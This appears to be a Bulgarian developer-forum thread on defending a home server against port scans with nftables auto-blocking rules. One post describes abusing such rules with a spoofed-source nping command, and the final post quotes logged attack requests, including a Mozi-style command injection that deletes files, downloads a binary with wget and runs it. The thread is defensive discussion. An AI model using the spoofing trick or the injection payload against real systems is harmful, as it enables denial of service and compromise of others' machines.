<bgdev />free

| |  


All tags 2023 9may ai algorithm alpha amd american api argon2 arm asm asmbb assembler attachment awareness balgaria bay888 bcrypt bender beta bgdev-next bgdev-next.👍 big.data bitchnigga bitcoin bmw boi borg brexit bug bulgaria business c cad chat cloud computer-names console crossorigin deprivation desktop dna dotnet email eupl falling feature forum foundation fp fresh fun game gcc github goats google gpl gpt gpt.3.5 gypsies happiness harvard hash improvement include investment it java javascript js kleta kleta.maqka.balg lambi language learning leftovers legend level levenshtein.dist libx license linkedlist linux m0 ma mcafee mele microsoft minimag minimalism negro net nginx nigga not.a.bug oop paradigm parler patterns perception persuasion pipe play.station politics populi pornhub pow pro programming protonmail python reba rust sci-fi scripting seks seo server shell sleep smartbeauty soft-skills sqlite srabska sse starship sugerface syntax tablet tailwindcss telegram theme thug troll80lvl tutanota typescript uacme ui uk unix untermensch upload uptime usa utilities ux vb via viber virtual.reality vox vps vulnerable war wasm weapons-grade web windows word x86 xbox xss youtube zig ziglang Übermensch БОКЕБЪЛГАРИН БЪ БЪлгария Белезниците Били Били.Белезниците БялДонор Веган Виста Възраждане ГЛУПАК Гана Глиста ЕС Казарма Копейкин Мода.и.овча.мисъ НЕКАДЪРНИК НРБ ПО-ЗЛЕ.И.ОТ.РАБИ Подкасти Разни Румен СИК СКУМ СетенЧук Скум ТИР Туче Украйна Урсула Яначков авангард аз айфонджия алгоритми амбиции анархизъм антиваксъри армения аудио аутисти бази.данни бакъп без без.пръчове безпросвета бенчмарк биготи биомаса бира боклук борисов ботев брадва булшит бъг бъгове бял ваксина вандал век венерика викинги вицове вишу война вървежен гана ганорник гей гейщина германия герои гешев глупак говеда групировка гюбек данъкоплатец двойни.стандарти дедотия демокрация дизайн дисциплина добитък докери долар донори држава дришльо дрон ебане еврогейски.съюз езици експеримент електроника електроника.s2 емиграция ендпойнт енум ерген ергономия жалкар задача затоплизъм защита здраве златен злато игри идеали идиократ идиократи идиокрация идиот избори избори.рабин изкуство икономика имбецили имейл инвестиране инокулация инструмента интервю ипад искам.да.си.реда казах камшикодържач капитализъм карабах караница картечница кино клавиатура ковид19 колайдер колям.кур комари комплексар комунизъм консолидация конспирации космонавтика кофа кофит-19 краставица криптовалути курви кучелюбци лайно лаладжия лаптоп либерастия литература лоши.практики луд лъжеучени лъжец любов майни майтапи малоумници мафия мениджмънт месо местене метавселена метафизика механика мистика мисъл мода мода.овча.мисъл модерация морал мутра мутри наука национализъм не.it негър некадърник некадърници неон нидерландия овча овчи олигофрени организация офтопик парички партия педал пенджури пенсия пишока плюскане победа погромист поезия политика порно посредствен почивка празници прасе превод предалщина програмиране проект проста простотии против.правилата проф пръч пръч.дришльо пръчка психика психични.болести психология пустиняк путин путката путьо рабин рабин.е.шибан.пе работа радост разврат разни разработка расизъм резерват рейтинг реклама рекламен религия рест ризи ропче ропчета русия руски.език рутина самоковска сасипаха секира село селяндур сериали сериозно.програм сетен сеянин симулация скопяване скръм слушалки сортиране софия софтуер софтуни социализъм спектрометър спринтове сране стандарти стил стуйо стюи сушилня сцена съвет съм сън сървър сърничка таб ташаци телевизия тема територията терминология термояд технологии титли традиция тролинг тръмп туба туче тъпак тъпанари тъпня уиндоус украйна умнокрасивци фалит фантастика фашизъм фейк.акаунти физика филми форум форумни.проекти футбол хазарт хамали харабия хардуер хахаха хомофобия хостинг храна хумор цайко цайси целофан цензура цензурра циганин чалга чалгар чекии чернокраки честота чипове чнг чужбина чук шпация щайга юан яката яко ям 🔨 😂 🪓


Защитна стена

  


  ФейкПрофил  Последно редактирано на 07.09.2020 от ФейкПрофил, видяно: 1059 пъти. #8622

Как се защитавате срещу сканиране на портове ?



  |  Създадено на 07.09.2020, видяно: 1053 пъти. #8626
ФейкПрофил

Как се защитавате срещу сканиране на портове ?

Използвам Google WiFi вързано към кабелния модем. Да се оправят тези от Гугъл. :)



  Courvoisier  Създадено на 07.09.2020, видяно: 1037 пъти. #8657
ФейкПрофил

Как се защитавате срещу сканиране на портове ?

Блокираш определени пакети и списъци с IP-та. Виж в нета.



  ФейкПрофил  Последно редактирано на 07.09.2020 от ФейкПрофил, видяно: 1023 пъти. #8665

Нищо не каза. Много лесно мога да блокирам разни загубеняци, които се опитват да ме сканират, но как да им попреча да използват моя firewall срещу мен ?

Обяснявам, като за дотнетаджии:

Имам нещоприблизително такова:

table inet filter {

  set allowed_ports {
      ....
  }

  set auto_blocked{
      ....
  }

  chain input {
    type filter hook input priority 0; policy drop

    ip saddr @auto_blocked counter drop


    # разни стандартни неща
    ct state invalid counter drop
    ct state established,related accept
    iifname lo accept


    tcp dport @allowed_ports accept

    ip protocol tcp tcp dport != @allowed_ports add @auto_blocked {ip saddr timeout 1h} counter log drop
    

    counter
  }

}


Като някой се опита да се върже към забранен порт, nftables го праща в диварника за 1 час. Супер, работи. Обаче аз съм злопаметно и отмъстително типче, и като ме блокираш когато те сканирам, ще ти го изкарам през носа:

 nping --tcp --source-ip <някакво ИП, което ти е важно> --dest-port <порт който е извън @allowed_ports> 1.2.3.4

И това ИП, което ти е важно бива блокирано :) Очевидно е, че мога да повторя упражнението с неприлично много адреси и да направя беля.

Та въпроса е - как се справяме с този проблем.



  Courvoisier  Създадено на 07.09.2020, видяно: 1000 пъти. #8703

Баце, блокирах 5000 айпита и се отказах. За микротик има тема, там блокираш определени ТСП. На какво ги блокираш? Пауло Алто, Микротик, Аса на Сиско, дай малко специфика. От приложение не ги блокирай, няма смисъл.



  Courvoisier  Създадено на 07.09.2020, видяно: 997 пъти. #8704
Courvoisier

Баце, блокирах 5000 айпита и се отказах. За микротик има тема, там блокираш определени ТСП. На какво ги блокираш? Пауло Алто, Микротик, Аса на Сиско, дай малко специфика. От приложение не ги блокирай, няма смисъл.

Ще ти шерна ако искаш ИП, но няма смисъл. Аре след малко ще ти ги поша.



  Courvoisier  Последно редактирано на 07.09.2020 от Courvoisier, видяно: 987 пъти. #8706

Аз направих вкъщи

Микротик Drop Port Scanners

Иначе на работа, имаме и събскрипшън за https://www.abuseipdb.com/ , за да блокираме IP-та за някой сървиси. Повечето ни сървиси са само на whitelist и/или ipsec и т.н., Имаме и paulo alto, и ASA. Вкъщи съм на евтини микротици за цени 400-500 лв.

Като блокираш, ако можеш го прави на preroute или там както ти е. Какво ползваш? Да блокираш на linux server-а с IP tables, не е толкова ефективно, защото все пак допускаш някакъв трафик през рутера, по- добре е да блокираш от самия рутер.



  gat3way  Създадено на 07.09.2020, видяно: 972 пъти. #8714
ФейкПрофил

Като някой се опита да се върже към забранен порт, nftables го праща в диварника за 1 час. Супер, работи. Обаче аз съм злопаметно и отмъстително типче, и като ме блокираш когато те сканирам, ще ти го изкарам през носа:

 nping --tcp --source-ip <някакво ИП, което ти е важно> --dest-port <порт който е извън @allowed_ports> 1.2.3.4

И това ИП, което ти е важно бива блокирано :) Очевидно е, че мога да повторя упражнението с неприлично много адреси и да направя беля.

Та въпроса е - как се справяме с този проблем.

Ти тоя номер пробвал ли си го? От домашната ти мрежа ще стане ОК, ма доста се съмнявам иначе да имаш особен успех. Последно номера минаваше много отдавна като бях на един малък квартален доставчик, оттам спуфнати пакети се изкарваха без никакви грижи. Беше преди 10-15 години. После ги изкупиха мегалан и номерът минаваше само до бордер рутерите им, а при а1 тва май си се реже още там дето правят intervlan рутирането между крайните клиенти. Има си добри мрежарски практики там, подозирам все пак че тук-таме има мрежи откъдето се изкарват такива неща, ма е рядкост вече.

А иначе кво те бърка че ти сканирали отворените портове, ще кажеш че нещо много ти бъркат, голям праз че сканирали.



  ФейкПрофил  Създадено на 08.09.2020, видяно: 928 пъти. #8848

От мойта мрежа става, от друга не съм пробвал. Но някак си не ми харесва да разчитам, че ИСП то ще си е свършило работата.



  gat3way  Създадено на 08.09.2020, видяно: 909 пъти. #8919

Ем то е да го кажем глобална отговорност, все пак обаче да може да се намери откъде да се правят такива тъпотии. Но като цяло трудно. Обикновения тъпак дето е решил да ти прави сечено, вероятно няма да ти го направи. А ако някой твърде силно е решил, еми ти си го просиш с тва "ще те режа щот ми достъпваш забранени портове". Тея неща се решават без такива тъпотии, слагаш полиси дроп на инпута, слагаш кое може да се достъпва и толкова, ама да правиш списъци от неща дето некой да ги достъпи и го режеш, да правиш простотии да дебнеш портсканиране (портсканирането колкото и просто да звучи е цела наука и ако некой иска да го направи потайно и подмолно, много трудно ще го спреш). Абе нема нужда бе. Просиш си простотиите само.



  Courvoisier  Последно редактирано на 09.09.2020 от Courvoisier, видяно: 890 пъти. #8953

Само портскан да, но някои от тях се опитват да рънват request-и да си пробват късмета, или откровено си brute force-ват. Аз лично банвам такива. Например:


GET /secure/ContactAdministrators!default.jspa HTTP/1.1
GET /weaver/bsh.servlet.BshServlet
GET /solr/ HTTP/1.1
GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
GET /TP/public/index.php HTTP/1.1
GET /phpMyAdmin/scripts/setup.php  HTTP/1.1
\x05\x04\x00\x01\x02\x80\x05\x01\x00\x03
\x04\x01\x00\x16\x7F\x00\x00\x01root\x00
CONNECT smtp.mail.ru:25 HTTP/1.1


Защитна стена

  



AsmBB v3.0 (check-in: 7544654b24928b93); SQLite v3.47.0 (check-in: 03a9703e27c44437);
©2016..2024 John Found; Licensed under EUPL; Powered by Assembly language Created with Fresh IDE